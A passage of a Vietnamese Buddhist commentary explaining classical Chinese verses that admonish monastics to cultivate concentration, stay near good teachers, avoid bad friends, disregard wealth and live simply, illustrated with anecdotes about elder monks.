“Người tốt không bị bỏ rơi”. Câu này rất có ý nghĩa. Người không trốn tránh tìm sự an nhàn mà phát tâm làm việc sẽ được mọi người cung kính. Ngược lại, người lười nhác không chỉ bị mọi người khinh thị, mà cả đến trời thần cũng đều ghét họ. Có thể thấy từ bỏ lười nhác, huân tập thói quen siêng năng là con đường chính yếu của sự tích phúc tu đức.
- Hạnh học định
Chữ hán:
出家要學定力
直把私心盡絕
單單提個話頭
自然萬緣俱息.
Phiên âm:
Xuất gia yếu học định lực
Trực bả tư tâm tận tuyệt
Đơn đơn đề cá thoại đầu
Tự nhiên vạn duyên câu tức.
Dịch nghĩa:
Xuất gia phải học định lực
Buông bỏ toan tính riêng tư
Chuyên tâm đề khởi thoại đầu[20]
Tự nhiên vạn duyên đều dứt.
Giảng giải
Bài kệ ngày hôm nay là nói về công phu tu hành. Mục đích chúng ta xuất gia là tu hành. Thế nào là tu hành đúng? Chuyển tâm thành thanh tịnh, đó là mục tiêu trọng yếu của người xuất gia. Chữ ‘tu’ có hai nghĩa: Thứ nhất tu là gọt, gọt bỏ những điều không tốt; giống như khi tạc tượng phải gọt bỏ những phần dư thừa, lưu lại những bộ phận chính yếu. Đó gọi là gọt. Thứ hai, tu là bổ, bổ sung vào những chỗ còn thiếu.
Do tập khí từ xưa đến nay, những hoạt động của thân tâm chúng ta biểu hiện ra ba nghiệp thân khẩu ý có rất nhiều chỗ chẳng như pháp. Đó chính là khiếm khuyết của chúng ta. Hoặc là có một số việc chúng ta không hiểu, không biết làm, cho nên chúng ta cần phải luôn luôn chú ý để bổ túc, như thế gọi là tu bổ. Hành tướng của ba nghiệp lấy tâm làm động lực chính; thế nên trước hết tu tốt hai nghiệp bên ngoài, sau đó mới đi sâu vào bên trong là tu tâm, làm cho ba nghiệp được thuần khiết thì đạo nghiệp tự nhiên thành tựu.
Định lực là một dạng công phu tu tâm. Chúng ta không thể phủ nhận tâm của mỗi người đều rất loạn động, người có thể đặt câu niệm Phật vào tâm trong mọi lúc cũng có nhưng không nhiều. Có bao nhiêu người có thể tiếp thụ lời dạy bảo của thiện tri thức để thường tự kiểm tra công phu chính mình? Chúng ta phải vượt hơn người, nổ lực tu hành thật tốt, thường tự soi rọi vào niệm tưởng của mình, mới không cô phụ một đời phát tâm xuất gia.
Ngày xưa trong đại Tòng lâm, đại chúng cùng nhau tu học, rất nhiều người mới học không biết dụng công, nhưng có trưởng nhóm hay vị Duy-na…những người có trách nhiệm tùy lúc chỉ dẫn, hay mọi người giám sát đốc thúc nhau vì thế đại chúng đều dụng công đắc lực, cá nhân quí vị cũng phải tự nhiên dụng công, không thể giải đãi. Tam học giới định tuệ là cơ sở tu học Phật pháp, Định do Giới mà được, Tuệ nhân định mà sinh, nhưng có nhiều người giữ giới mà không biết tu định. Thí như có người giữ không sát sinh, không trộm cắp, không nói dối…, những điều này ở trong tăng đoàn chúng ta rất dễ thực hiện, nhưng người có định lực thì rất ít, bởi vì đa phần không biết dụng công, không chú ý giữ câu thoại đầu của chính mình, lại thường quên mất công phu tu hành bản thân mà ưa nhìn vào lỗi người khác, chỉ chú ý đến những điều khiếm khuyết của người rồi thêu dệt thị phi, rảnh bàn chuyện phiếm, đó là những điều tối kị của người tu hành. Vì thế, hằng ngày chúng ta phải chú ý xa lìa thú rảnh rỗi bàn chuyện người khác. Nếu quí vị cũng tham gia bàn chuyện phiếm thì rất hiển nhiên quí vị cũng không có tu hành, chúng ta phải kiểm điểm, tự mình không nên như thế.
Mỗi lần tôi thấy hai vị tăng sinh cùng nhau nói chuyện, chẳng thấy gì ngoài chuyện phiếm hằng ngày, như thế là không tốt. Nếu có vấn đề cần thảo luận thì vài ba lời là có thể giải quyết. Ngay cả việc gọi điện thoại cũng giống như thế, cố gắng tránh nói lang bang, không thì không chỉ phí tiền điện thoại mà còn trì hoãn công phu, không thể cho rằng là không tổn thất. Nên biết thời gian đáng quí, quỉ vô thường không nhân nhượng, không biết tranh thủ hiện tại học nhiều thêm một chút mà cứ để một phút, một giây thời gian trôi qua thì một ngày kia cái già chết đến, hai tay trống không, thì chẳng những đáng thương mà còn đáng xót?
Học định lực, tự mình trước phải dứt tận tư niệm, những tranh ưu tranh khuyết, khen mình chê người…đều là biểu hiện tôn sùng tự kỉ, bởi mục đích là ở chỗ đề cao mình hạ thấp người khác. Còn có những việc vui thích như châm chích gây chia rẽ, thêu dệt thị phi cũng không ngoài tập tính vị kỉ. Cổ nhân nói: “Người nói chuyện thị phi, thì chính là người thị phi”. Nhân cách của người nói chuyện thị phi khinh khi kẻ khác người còn thấp hơn kẻ vị kỷ, không xứng để bàn luận. Thế nên không kể thị phi về phương diện nào, tốt nhất là không nên có. Thời thời khắc khắc phải xét lại mình, xem nhiều thêm một vài quyển sách có ích; đem sở học của mình viết thành bút kí, hoặc viết thành nhật kí thường ngày. Học vấn là sự tích tập lâu dài, cần phải dùng tâm thành mà cày xới, chẳng nên luôn luôn để người khác nhắc nhở đốc thúc. Người nào cũng có hoàn cảnh riêng của mình, hi vọng đại chúng bỏ hết tâm riêng tư. Việc trừ bỏ ấy rất liên quan đến việc học đạo bên trong và việc hoằng dương Phật pháp bên ngoài, không nên vì những việc riêng tư ấy mà lãng phí thời gian.
“Chuyên tâm đề khởi thoại đầu”: là dùng phương pháp dụng công chân thật, chỉ cho việc tham thoại đầu không gián đoạn. Như tham: “Ý chỉ của Tổ sư từ phương Tây đến là gì?” hoặc: “Trước khi cha mẹ sinh ta là ai?”. Cổ nhân đã tham thành công dạng công án như thế, chúng ta cũng nên tham như thế, bất cứ lúc nào cũng đề khởi câu thoại đầu. Như nhà triết học Newton nhân nhìn trái táo rơi xuống đất mà suy nghĩ: Tại sao những vật ấy không lơ lững trong không khí mà phải rơi xuống đất? Lâu ngày suy nghĩ về hiện tượng ấy cuối cùng phát ra nguyên lí lực hấp dẫn của trái đất.
Có thể thấy, nếu đem vấn đề suy xét kĩ càng, liên tục thì nhất định sẽ có một ngày vấn đề ấy được khai mở, đó là ưu điểm của tham thoại đầu. Đồng thời, tham thoại đầu cũng chính là phương tiện hữu hiệu ngăn dứt vọng niệm. Vì thế, nếu chúng ta muốn thấu đạt chân lí thì nên theo phương pháp này, tham hoài không xả thì tự nhiên mọi duyên đều dứt, ngày kia chuyển hóa phàm thân. Nếu một người lúc nào cũng đề khởi thoại đầu thì không thể nói chuyện tạp, lúc ấy tự nhiên vọng niệm chẳng khởi. Vọng niệm giống như cỏ dại mọc rất dễ mọc, vì vậy ban đầu dụng công cần phải đề khởi thoại đầu ngăn chặn, không để nó phát sinh. Công phu lâu ngày thành thục thì tự nhiên nó chẳng khởi, vạn duyên đều dứt, nước tâm trong lặng, tâm địa sáng suốt, trí tuệ nhân đó mà khai mở, và cơ duyên đến, tình cờ quí vị có thể đại triệt đại ngộ. Đến thời khắc ấy, quí vị được đền bù những gì khổ nhọc đã trải qua. Cho nên chúng ta phải hạ thủ công phu theo phương pháp này, đừng nghĩ rằng tùy tiện tham thiền thoải mái hơn, nên biết đó đều là vọng tưởng. Ghi nhớ, thường đề khởi thoại đầu, công phu chân thật mới có thể cắt đứt vọng niệm, mới có thể được lợi ích lớn.
- Hạnh gần gũi thiện tri thức
Chữ hán:
出家要近善人
死心蹋地相親
學些好樣在肚
自然脫俗離塵.
Phiên âm
Xuất gia yếu cận thiện nhân
Tử tâm đạp địa tương thân
Học ta hảo dạng tại phủ
Tự nhiên thoát tục li trần.
Dịch nghĩa:
Xuất gia phải gần người hiền
Dốc hết tâm thành thân cận
Học những điều hay để lòng
Tự nhiên li trần thoát tục.
Giàng giải
Người hiền là người có học vấn, có tu hành. Kinh Hoa nghiêm gọi là thiện tri thức. Thiện tri thức là tăng thượng duyên cho chúng ta học Phật. Thầy sáng bạn lành là trợ thủ không thể thiếu để chúng ta thành tựu Phật pháp. Kinh Hoa nghiêm có mấy chương nói rõ về sự trọng yếu của thiện tri thức. Như Thiện Tài Đồng Tử nhờ sự khai thị của bồ-tát Văn-thù-sư-lợi mà phát tâm học Phật, lên đường tham vấn thiện tri thức. Thiện Tài đi qua 110 thành, tham hỏi 53 vị Bồ-tát thiện tri thức. Nhờ tham học với 53 vị bồ-tát siêu xuất mà Thiện Tài có thể ngay thân này thành tựu Bồ-đề đại đạo. Vì thế Tổ sư dạy người xuất gia học đạo cần phải thân cận thiện tri thức.
Tiêu chuẩn của thiện tri thức là gì? Làm sao biết là thiện tri thức? Thông thường người ta cho rằng người có học vấn, có tu tập gọi là thiện tri thức. Trong Phật giáo chúng ta ngoài việc người có học có đức hạnh còn phải thêm một điều kiện nữa là có khả năng làm lợi ích cho người khác. Đầy đủ như thế mới là thiện tri thức tiêu chuẩn. Nho gia thì lấy ba đức ‘người thẳng thắng, bao dung, và hiểu biết nhiều’ làm điều kiện tiêu chuẩn của thiện tri thức. Điều này so với Phật pháp sai khác không nhiều. Người có tâm thẳng thắng có thể nói nhiều một chút nhưng tâm người ấy bộc trực, không chứa gian trá, hư ngụy. Người ấy thấy việc tốt liền ca ngợi, thấy việc xấu liền răn khuyên, thậm chí đốc thúc chúng ta phải tinh tiến. Đó là người tốt, có thể cùng họ giao du. Người có tâm lượng bao dung, có thể thông cảm với những khó khổ của người khác, có thể tha thứ những sai lầm của người khác. Đó là người có sự tu dưỡng rất cao, chúng ta phải nên thân cận. Người hiểu biết sâu rộng là người có kiến thức bao la, chúng ta nên theo học tập, để trau dồi tri thức.
Khổng Tử dạy chúng ta chọn bạn bằng ba tiêu chuẩn ấy. Đối với hạng người lúc tiếp đãi luôn tươi cười, trong tâm ẩn chứa gian trá thì tốt nhất nên đề phòng. Thậm chí phải xem chừng đừng để nhiễm những điều xấu của họ. Cổ nhân nói: “Kết bạn với người hiền như đi trong sương mù, tuy không ướt áo nhưng được thấm nhuần”. Thường giao du với bạn tốt như đi trong sương sớm tuy không bị ướt áo nhưng có thể nhận được sự thấm ướt mát dịu. Đó là nói khi giao du với người hiền, những cử chỉ, lời nói của họ tự nhiên mình huân tập và cải đổi những thói quen xấu của mình, học được dung nghi, cử chỉ đoan chính của họ. Thân cận người hiền có lợi ích như thế.
“Dốc hết tâm thành thân cận”: Đã biết được người tốt thì phải học tập người ấy, chẳng nên tâm không kiên định, thương ghét bất thường. Ngày xưa các bậc Tổ sư thân cận thiện tri thức thường cùng ở trong một trụ xứ một năm, hai mươi năm. Gần gũi với thời gian dài như thế, mục đích là để học được nhiều về cách làm người, cách làm việc… nhưng những thanh niên thời nay rất khác, mới học hiểu được một chút họ liền chạy lăng xăng chỗ này chỗ nọ, cho nên khó thành đại khí.
Vì thế tôi thường yêu cầu các tăng sinh nghìn lần, vạn lần không được chống đối, xa bỏ thầy mình, cô phụ những bậc sư trưởng đức hạnh, phải tôn sư trọng đạo, phải thực hành tốt điều này. Một người đã học không tốt thì tu hành cái gì?! Hạng người ấy dễ dãi với bản thân, lười biếng, buông thả, sợ người kiểm soát, thật không có gì vô ích bằng. Thế nên, chúng ta đã gặp được thiện tri thức thì phải dốc hết tâm thành thân cận, mới mong có thể học hỏi được nhiều điều.
“Học những điều hay để lòng”: Nếu vị thiện tri thức của chúng ta có học vấn, có tu dưỡng, có đạo đức, thế thì lời nói và việc làm của vị ấy trong mọi phương diện đều khiến cho ta phải học tập. Đó gọi là ‘Học những điều hay để lòng’. Lòng là đại biểu cho tâm, nghĩa là sau khi học được những gì ở thiện tri thức phải ghi nhớ trong lòng. Nói cụ thể hơn là ghi nhớ tất cả những oai nghi, cử chỉ, lời lẽ, học thức, phương cách lãnh chúng…của bậc thiện tri thức để sau này mình có thể sử dụng.
“Tự nhiên li trần thoát tục”: Đó chính là nói một người sau khi đã học tốt với bậc thiện tri thức, y giáo phụng hành thì trên con đường đạo nghiệp có sự thành tựu; tự nhiên chẳng bị người khác khinh thường là phát ra ngôn hạnh không hợp lễ nghi mà ngược lại ngôn hạnh cao nhã, cử chỉ đoan nghiêm, ở mọi nơi đều biểu hiện cốt cách thoát tục li trần.
Như thế, bên ngoài thì biểu hiện phong cách thoát tục, bên trong thì tự nhiên thanh tịnh, trong và ngoài đều tu dưỡng đồng nhất thì tương lai đạo bồ-đề sẽ thành thục. Nếu người không chịu tham học thì tuy nhiều năm xuất gia nhưng tục khí vẫn còn, đi đến đâu cũng bàn phiếm luận suông, cho rằng siêu xuất nên không câu nệ nhưng một chút khí chất trang nghiêm cũng không có. Hạng người ấy chắc hẳn chưa từng học với bậc thiện tri thức, hoặc là những bậc thầy dạy họ, họ không ghi lòng tạc dạ, nên ở đâu họ cũng khiếm nhã, thật đáng tiếc! Vì thế, chúng ta muốn trở thành bậc đại trượng phu xuất thế li trần thì nên thân cận thiện tri thức, nhận sự dạy bảo, ghi lòng những điều đã học được và cố gắng thực hành những lời dạy ấy.
- Hạnh lìa xa bạn ác
Chữ hán:
出家要離惡友,
一惡般般出醜。
王法不怕惡人,
惡人披枷帶杻。
Phiên âm
Xuất gia yếu li ác hữu
Nhất ác ban ban xuất xú
Vương pháp bất phạ ác nhân
Ác nhân phi già đái nữu.
Dịch nghĩa
Xuất gia phải xa bạn ác
Một ác thành muôn điều xấu
Pháp luật chẳng sợ người ác
Người ác phải đeo gông cùm.
Những người bạn ưa nịnh hót biểu hiện tư cách không tốt, hoặc những người bạn chuyên làm việc ác thì cần phải tránh xa họ. Chơi với người ác thì dù mình không làm ác cũng phải bị liên lụy, bị quấy nhiễu, không có cách nào để an tâm tu hành. Vì thế không được thân cận bạn ác.
Danh dự là mạng sống thứ hai của con người, nếu quí vị gặp phải bạn ác, đã có những hành vi ra ngoài pháp luật, nhân cách đã có vết nhơ thì mãi mãi không cách nào ngẩng đầu trước mọi người. Như hiện nay, bất kì tổ chức nào người ta thường kiểm tra lí lịch của những người tham gia, xem có tiền án tiền sự gì không, nếu có thì họ khó chấp nhận, huống gì là có thể nâng đỡ.
“Một ác thành muôn điều xấu”: Việc mà người ác làm khiến cho mọi người trái mắt, chán ghét, xa lìa. Khổng Từ dạy chúng ta lựa chọn ba hạng bạn tốt, đồng thời cũng dạy chúng ta phân biệt ba hạng người xấu, đó là bạn tiện tịch, bạn thiện nhu và bạn tiện nịnh. Ba hạng người này tuyệt đối không kết giao.
Bạn tiện tịch: hạng người này không trọng đức hạnh, thích đi khắp nơi, ăn nói lớn lối, chẳng chịu vào khuôn phép của sư trưởng. Có lúc bất đắc dĩ tiếp nhận nhưng chẳng bao lâu đã rời bỏ người quản lí, không một chút mảy may ngại sợ, biểu hiện thái độ phóng dật. Hạng người ấy không giữ phép tắc, không phục tùng, bị xã hội ruồng bỏ. Kết bạn với hạn người như thế nhất định sẽ bị liên lụy vì thế cần phải tránh xa.
Bạn thiện nhu: hạng người này tương phản với dạng người tiện tịch, nghĩa là một bề nhu hòa để được lòng người khác, nhưng thường biểu hiện sự dối trá nịnh hót. Người ấy hành vi bất chính, tranh thủ sự ưu ái của người khác, không có nhân cách cao thượng, quang minh lỗi lạc mà lại nhu nhược hèn hạ. Trong phẩm An Lạc ở kinh Pháp hoa gọi hạng người này là người bất tịnh. Thế tục gọi hạng người này là “yêu nhân”, thân cận với hạng người này rất dễ dẫn đến sự ngộ nhận của người khác, cho rằng chúng ta cũng nhu nhược hèn hạ, không giữ giới. Gần hạng người này khiến nhân cách của chúng ta dễ bị tổn thất, vì thế chúng ta phải loại trừ đừng kết giao với họ. Tự bản thân mình phải quang minh chính đại, đầu đội trời chân đạp đất, người nam thì phải có cốt cách của người nam; người nữ thì phải có phong thái của người nữ.
Bạn tiện lịnh: tiện nịnh chính là “xảo ngôn lịnh sắc”, chuyên môn tâng bốc người khác, nghĩ ra những kế hay để lợi dụng người khác. Những hạng người như thế không nên thân cận. Đã là con người ai cũng thích nghe những lời êm dịu, họ nắm lấy nhược điểm của con người để lấy lòng quí vị. Ngày xưa, ngài thượng Trí hạ Quang lão nhân có một đệ tử doanh nghiệp qui y, ông ta rất thích ca tụng mình. Mỗi chiều sau giờ làm việc ông đều đến Thái lão nhân để đảnh lễ vấn an, rồi nói hết những điều đắc ý trong công việc làm ăn của mình. Lão thái nhân xuất gia từ nhỏ không có kinh nghiệm xã hội, nghe xong liền tán thán ông ta: “Tốt, ông rất có khả năng!”. Cứ như thế, Lão Hòa thượng đem toàn bộ số tiền tích trữ bấy lâu chuẩn bị để sau này mang tiền về đại lục trùng tu ngôi chùa ở quê nhà giao cho anh ta để sinh lời.
Lúc Hòa thượng viên tịch, vị đệ tử ấy đến hoàn toàn chẳng chút đau xót, hoặc biểu thị sự trợ giúp lo lắng tang sự, mà chỉ hỏi: “Có ghi lại số nợ khi Hòa thượng còn sống cho mượn không?” Tất nhiên là chúng tôi biết được dụng ý của câu hỏi ấy nên trả lời: “Có, đang kiểm tra”. Bấy giờ là Dân quốc năm thứ năm mươi hai (1964), chúng tôi kiểm tra biết được Hòa thượng để lại hơn 40 vạn. Số tiền ấy là Hòa thượng để sau này tu sửa đạo tràng tại quê nhà, nhưng hiện tại rơi vào tay thương nhân ấy. Thế rồi, vị ấy đến thương lượng, chúng tôi thành lập một hội đồng quản trị để bảo quản và yêu cầu ông ta phải có thái độ rõ ràng. Ông ta nói: “Khoản tiền còn lại này là Hòa thượng muốn tôi sau này mang về đại lục”, rồi ông ta không chịu đưa. Qua nhiều lần thương lượng, ông ta nói dối rằng số tiền ấy ông giữ nguyên chứ không làm sinh lời. Nhân việc những tín đồ quyên góp tiền thành lập hội quỹ học bỗng nên chúng tôi đã bầu ông làm chủ tịch hội, với điều kiện là ông phải rút lợi tức của hơn bốn mươi vạn đồng ấy ra cấp học bỗng để kỷ niệm Trí thái lão nhân. Tính toán hồi lâu, cuối cùng ông chấp nhận. Hạng người như thế có tốt không? Đương nhiên là không tốt. Hiện nay ông ta gặp thất bại rất thảm. Đó là “xảo ngôn lịnh sắc”; đó là kết cục của người không biết nhân quả.
Trên đây nói về ba hạng người ác, tốt nhất là chúng ta nên xa lìa, không nên cùng họ giao tiếp, nếu theo họ làm ác, không sớm thì muộn sẽ bị pháp luật trừng trị. Nên biết pháp luật không sợ kẻ ác, trước pháp luật mọi người đều bình đẳng, sống trong pháp luật mọi người được tự do. Kết cục của người ác là đeo mang gông cùm. Trường hợp như thế liệt kê rất nhiều. Chẳng hạn như trường hợp vụ án của Hợp Tác Xã Tín Dụng, mới gần đây thôi. Vì thế các bạn phải cẩn thận, phải gần gũi nhiều người thiện, tránh xa người ác. Đó là lời giáo huấn minh triết bảo vệ thân tâm tốt nhất.
- Hạnh xem nhẹ vật chất
Chữ hán
出家要輕財物,
不可千方百計。
一口氣若不來,
一文拿他不去。
Phiên âm
Xuất gia yếu khinh tài vật
Bất khả thiên phương bách kế
Nhất khẩu khí nhược bất lai
Nhất văn nã tha bất khứ.
Dịch nghĩa
Xuất gia phải khinh vật chất
Chớ nên nghìn kế tìm cầu
Thở ra không còn trở lại
Chẳng thể giữ được một đồng.
Giảng giải
‘Tài’ là tiền bạc, ‘vật’ là những vật chất cần thiết cho sự sống. Người xuất gia lấy việc tu hành làm việc trọng yếu. Phật dạy: Chúng ta nhiều đời nhiều kiếp bị trôi lăn trong vòng sinh tử, chịu đủ nghìn cay vạn đắng là do chúng ta không biết, cũng không có cơ hội gặp gỡ, gần gũi thiện tri thức và kết duyên cùng Phật pháp nên không biết bao giờ thoát khỏi khổ đau. Đó là việc rất đau xót. Đại sư Tỉnh Am vị tổ thứ chín của tông Tịnh Độ nói: Nếu đem hài cốt của chúng ta từ vô thỉ đến nay trầm luân trong sinh tử chất lại thì đống xương ấy còn cao hơn núi Tu-di; gom máu huyết lại thì nhiều hơn nước bốn biển. Từ đó có thể thấy chúng ta đã chịu bao nhiêu khổ nạn trong dòng sinh tử, nổi trôi trong sáu đường, nhất định là khổ nhiều vui ít. Hiện tại, chúng ta tính hết tất cả những vận may thì có lẽ nhiều đời, nhiều kiếp trước từng trồng căn lành trong Phật pháp nên đời nay mới có cơ duyên được xuất gia.
Đây là một cơ hội viễn li sinh tử, ra khỏi ba cõi nghìn đời khó có, vạn kiếp khó gặp; nghìn vạn lần chúng ta đừng bỏ qua cơ hội này. Thân người khó được, Phật pháp khó nghe, được xuất gia chính là điều khó trong những điều khó. Phật dạy: Chúng sinh trong các cõi bỏ mất thân người nhiều như đất ở địa cầu, người được làm thân người mà biết giữ được thân người trong kiếp sau thì ít như chút đất ở trong móng tay. Sự sai biệt ấy quá lớn không thể so sánh được. Vì thế, chúng ta cần phải phát tâm dũng mãnh, lập chí kiên cố, chẳng nên tùy tiện bỏ qua cơ hội tốt giải thoát xuất thế này.
Tài vật là thứ được mọi người ưa chuộng, ai mà không muốn có tiền để tùy ý sử dụng, như xây nhà, sắm sửa áo quần, ăn uống…người nào mà không mong muốn được hưởng thụ. Song những thứ đó không có lợi ích gì trong việc giải thoát sinh tử mà ngược lại khiến con người đi vào chỗ lười biếng. Đại sư Liên Trì nói: “Xuất gia cần phải đạm bạc”. “Xuất gia phải thường mang ba phần bệnh” mới có thể tỏ ngộ được vô thường, hàng phục dục vọng. Ăn uống đầy đủ là tốt, không cần phải tham cầu món ngon, chỗ ở kín đáo không bị nắng mưa là được, không cần phải nhà đẹp lầu cao.
Ngày xưa, có vị Tổ sư ở trong một ngôi nhà dột nát. Một hôm tuyết rơi, tín đồ thấy những hạt tuyết đi qua những lỗ dột rơi đầy trong nhà, họ muốn tu sửa hay làm nhà mới cho ngài, ngài nói: “Không có vấn đề gì, tôi còn có một góc để tránh gió tuyết, chẳng có thời gian để tu sửa”. Cổ đức có thái độ khinh tài vật và đặt nặng việc tu dưỡng đạo đức cao độ như thế, cho nên được tôn làm tổ sư. Đây chính là tấm gương sáng cho chúng ta noi theo.
“Chẳng nên nghìn kế tìm cầu”: Người xuất gia không có đạo tâm, không có chí lớn thì họ không thể hạ thủ công phu, giải quyết việc lớn sinh tử một cách chân chính. Một vị Tăng ngu ngốc thì trăm phương nghìn kế vì thức ăn vật mặc, lấy đó làm mục đích hướng tới. Hiện tượng quái lạ ấy không chỉ có mặt ở Đài Loan hiện nay mà quá khứ cũng từng xảy ra. Có một vài Phật tử, hay những quả phụ, những chị em nhàn rỗi lại có tiền, họ đi đến chùa tìm những người xuất gia có chút bề ngoài rồi tâm sự dụ dẫn, nếu là người xuất gia đạo tâm không kiên định thì khi thấy tiền liền đi theo họ. Đó là hạng hạ liệt, tôi thấy việc này xảy ra rất nhiều.
Do việc này mà Nam lão nhân thầy tôi thường nói: “Chúng ta ăn cơm nghìn nhà, không ăn cơm một nhà, dù họ là người hộ pháp có tiền, vợ của quan lớn, hay tín đồ không có tiền, chúng ta phải đối xử không phân biệt”, người đến không cản, người đi chẳng lưu. Tôi kính cẩn ghi nhớ lời răn bảo từ bi này, nên không bao giờ phân biệt tín chúng; cũng không bao giờ đi đến nhà tín đồ thăm hỏi. Vì chúng ta không nghĩ đến vật chất của họ, tôi cũng không muốn tiền, giữ tiền ở trong thân, chỉ tăng thêm tai họa mà thôi, nên giữ tiền không bằng giữ đạo. Giữ một vài sự nghiệp phúc lợi xã hội của Phật giáo, làm một vài việc thiện, việc công đức như giáo dục, văn hóa, cứu tế xã hội…Đó là từ thiện của Phật giáo, và cũng là hướng dẫn cho tín đồ biết tu hạnh bố thí cúng dường. Nếu một người sau khi xuất gia còn dùng trăm mưu nghìn kế để kiếm tiền thì so ra không bằng người đời, căn bản đã mất ý nghĩa xuất gia.
“Thở ra không còn trở lại, chẳng thể giữ được một đồng”: Đời người chẳng qua mấy mươi năm, một hơi thở ra không trở lại thì dù tiền của có nghìn vạn, ức vạn cũng đâu dùng được, cho đến một đồng tiền cũng không thể giữ. Những đạo lí ấy mọi người đều biết, nhưng lại rất khó bỏ lòng tham. Có bao nhiêu người không động tâm vì tiền? Không để tâm nơi quyền thế? Chúng ta là người xuất gia tu đạo, phải chú ý tới phương diện này, không nên: “Một niệm đã sai, muôn niệm đều lạc[21]”, dễ dàng mất đi nhân duyên giải thoát, bỏ qua cơ hội vượt thoát sinh tử, thật rất đáng tiếc! Tổ sư thẳng thắn thành thật nói như thế là muốn chúng ta đau lòng mà cảnh tỉnh. Vì mọi người đều biết tham tài vốn chẳng có ích lợi gì, nhưng khi thấy tài lợi trước mắt thì lại hiếm người có thể buông xả; thậm chí không ít người luôn luôn lo lắng không có tiền xài nên dùng trăm phương nghìn kế để kiếm tiền, thật là đau khổ biết bao! Tôi còn nhớ pháp sư Đông Sơ nói: “Có nhiều người không thể hiểu được! Họ thường phiền não vì không đủ tiền dùng, nhưng đến khi mạng dứt khí tuyệt thì bao tiền ở thắt lưng còn cất giữ không sử dụng hết”. Vì thế tục ngữ có câu: “Người vì tiền tài mà chết”. Lãng phí một đời đều vì tham tiền tài.
Có một vài quan lớn, vì một niệm sai lạc tham chứa của phi pháp, kết quả phải chịu thân bại danh liệt, không chỉ đánh mất con người trong hiện tại mà phải mang nợ nhân quả. Chúng ta xuất gia học Phật, ở phương diện này phải kiên định lập trường! Trong Phật pháp, các vị Tổ sư đều cảnh tỉnh chúng ta, vì thế chúng ta phải kiến lập một quan điểm chính xác, không nên làm người ngu ngốc tham tài vật.
- Hạnh đạm bạc
Chữ hán
出家要甘淡泊,
自古三常不足,
莫嫌淡飯黃虀,
古人纓絡炊粥。
Phiên âm
Xuất gia yếu cam đạm bạc
Tự cổ tam thường bất túc
Mạc hiềm đạm phạn huỳnh tê
Cổ nhân anh lạc xuy chúc.
Dịch nghĩa
Xuất gia cần phải đạm bạc
Từ xưa “tam thường bất túc”
Chớ chê cơm nhạt rau vàng
Người xưa nấu cháo anh lạc.
Người xuất gia nên giữ nếp sống đạm bạc. Vì sao cần giữ nếp sống đạm bạc? Nên biết người xuất gia lấy đạo làm trọng, duy trì cuộc sống cốt là không đói lạnh, không nên thụ hưởng vật tốt đẹp. Nếp sống đạm bạc ấy đa phần người xuất gia đều thực hành cho nên thông thường những bậc cha mẹ không cho phép con mình xuất gia, cũng chính là vì sợ con mình ở trong chùa phải chịu khổ. Kì thật, nếp sống đạm bạc hoàn toàn chẳng phải là biểu hiện của sự khổ, chỉ là không có ý hưởng thụ vật chất trong cuộc sống hằng ngày mà thôi. Khổng Tử nói: “Quân tử nghĩ về đạo chứ không nghĩ đến chuyện ăn uống[22]”. Khổng Từ là vị thánh nhân của thế gian, ông đối với nhu cầu sinh hoạt còn có tiêu chuẩn như thế, huống gì là người xuất gia học Phật như chúng ta, vốn là lấy liễu sinh tử, thoát tam giới làm mục đích?! Ngũ dục là cội nguồn sinh tử, không thể chạy theo ngũ dục, chạy theo nó là trái ngược với đạo, làm sao có thể liễu thoát được sinh tử, ra khỏi tam giới? Nói thẳng, đó là hành động và mục đích trái ngược nhau, như leo cây tìm cá. Vì thế, Tổ sư đặc biệt đưa ra điều trọng yếu là phải đạm bạc.
“Cam đạm bạc”: là chỉ cho việc không tham cầu hưởng thụ, tập thành thói quen thanh đạm, khiến đời sống tu đạo giản dị tự nhiên. Vì thế, hằng ngày cổ đức dạy ở trong ba phương diện ăn, mặc, ở phải đơn giản tối đa. Bởi nếu không biết tri túc ba phương diện ấy, cứ phát ý tìm cầu thì đạo tâm càng ngày càng xa.
Xã hội ngày nay kinh tế phát triển, đề cao hưởng thụ vật chất, người đời si mê, cứ một mực hưởng thụ trong sự lãng phí, không biết dừng đủ. Người xuất gia bên ngoài lo mở mang chùa chiền, bên trong trang trí cũng rất cầu kì, cầu kì đến mức phải sử dụng những tấm thảm thượng phẩm, ghế sofa… tôi thấy như vậy hơi quá đáng. Chúng ta là người xuất gia, đều là những người không tạo ra của cải vật chất, không cày mà có ăn, không dệt mà có mặc, nhu cầu sinh hoạt đều nhờ vào sự cúng dường của tín đồ. Nếu chúng ta không nhờ vào tín đồ, nhờ vào Phật sự tụng kinh bái sám… thì chẳng có tiền, nhưng tiền có được từ sự tụng kinh bái sám cũng là tiền nhân quả. Nếu không đem nó dùng vào việc hoằng dương Phật pháp mà tiêu xài lãng phí cho việc hưởng thụ trong cuộc sống thì như thế cũng là một dạng tội lỗi.
Trước đây, lúc sư tổ Trí thái lão nhân còn sống, ngài không bao giờ sử dụng ghế sofa. Dụng cụ ngài sử dụng như bàn, ghế đều là những đồ bỏ của người ta, sửa sang lại rồi dùng. Đến lúc Liên Hoa Xã trùng kiến hoàn thành, nhiều lần tín đồ yêu cầu, ngài mới nhận hai chiếc ghế mây do họ cúng dường. Đến như thảm lót thì Nam lão nhân cũng từng không chịu dùng, sau đó tín đồ mua liều cúng ngài, kết quả là ngài không bằng lòng.
Lúc còn sống lão nhân gia không chịu sử dụng, đem thảm cất vào một chỗ, sau này khi ngài viên tịch, chúng tôi nghĩ đã mua rồi thì không thể gửi lại, tốt nhất đem trải ở nhà Tổ, chỉ có như thế hoàn toàn không trái ý lão nhân và là cách sử dụng tốt nhất. Nếp sống kiệm ước của hai lão Hòa thượng trong hai thời như thế rất đáng để chúng ta học tập. Sinh hoạt của người xuất gia chúng ta càng đơn giản thì càng có thời gian dụng công, càng có khả năng hàng phục tham dục vọng niệm.
“Chớ hiềm cơm nhạt rau vàng
